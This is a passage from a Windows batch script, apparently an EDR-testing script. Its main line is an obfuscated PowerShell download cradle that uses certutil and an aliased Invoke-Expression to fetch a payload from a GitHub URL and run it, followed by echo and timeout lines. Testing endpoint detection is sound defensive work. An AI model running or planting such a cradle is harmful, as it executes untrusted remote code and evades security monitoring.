/c powershell -c "SV c3z 'https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt';dir ty*;SI Variable:\NI1 (certutil -ping (GV c3z).Value);.(GAL IE*)(((Variable NI1 -Val)[2..(((Variable NI1 -Val)).Length-2)]-Join\"`r`n\"))" +echo Execution Finished at %time% %date% +timeout 5 + + + echo [+] Let tasks finish before deleting all the files timeout 60